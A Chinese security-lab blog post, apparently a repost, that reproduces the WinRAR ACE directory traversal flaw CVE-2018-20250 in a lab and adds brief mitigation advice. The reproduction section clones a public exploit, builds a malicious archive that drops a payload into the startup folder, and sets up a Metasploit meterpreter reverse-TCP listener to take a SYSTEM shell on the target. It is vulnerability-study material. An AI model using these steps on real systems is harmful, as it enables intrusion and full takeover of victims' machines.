WinRAR目录穿越漏洞

释放双眼,带上耳机,听听看~!

网安引领时代,弥天点亮未来   




 


漏洞详情

    该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行

漏洞编号:CVE-2018-20250

影响版本:

    WinRAR < 5.70 Beta 1

    Bandizip < = 6.2.0.0

    好压(2345压缩) < = 5.9.8.10907

    360压缩 < = 4.0.0.1170


复现环境

exp下载:

https://github.com/WyAtu/CVE-2018-20250/


复现过程


1.使用Metasploit生成Payload

2.使用exp生成恶意程序

cd /root/Desktopgit clone https://github.com/WyAtu/CVE-2018-20250.gitcd CVE-2018-20250cp /root/WinRAR.exe ./vim exp.py

将exp.py中的evil_filename = “calc.exe”改为”WinRAR.exe”

将CVE-2018-20250文件夹复制到Windows10中执行 

3.在靶机上运行恶意程序

将test.rar 投放到win8上 解压运行

4.在kali上监听metasploit

msf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.112.140msf exploit(handler) > set lport 44444msf exploit(handler) > run

5.控制靶机

Win8重启之后 kali会接受到会话 此时执行shell

进入到win8系统的system权限


漏洞防御

1. 删除受影响压缩软件目录下UNACEV2.dll文件能有效防御

2. 升级到最新版本,WinRAR 目前版本是 5.70 Beta 1

3. 总而言之,该漏洞并没有那么致命。目标性的打站,得先欺骗下载,并再在未防护的服务器上解压,企业服务器管理员都很难会这样做。而且必须得服务器重启才能生效,不能直接执行脚本




学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室


本文源自微信公众号:弥天安全实验室

人已赞赏
安全工具

Slowhttptest----DoS攻击工具简介

2019-10-18 16:53:05

安全工具

WordPress 5.0.0 远程代码执行漏洞

2019-10-18 16:53:10

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索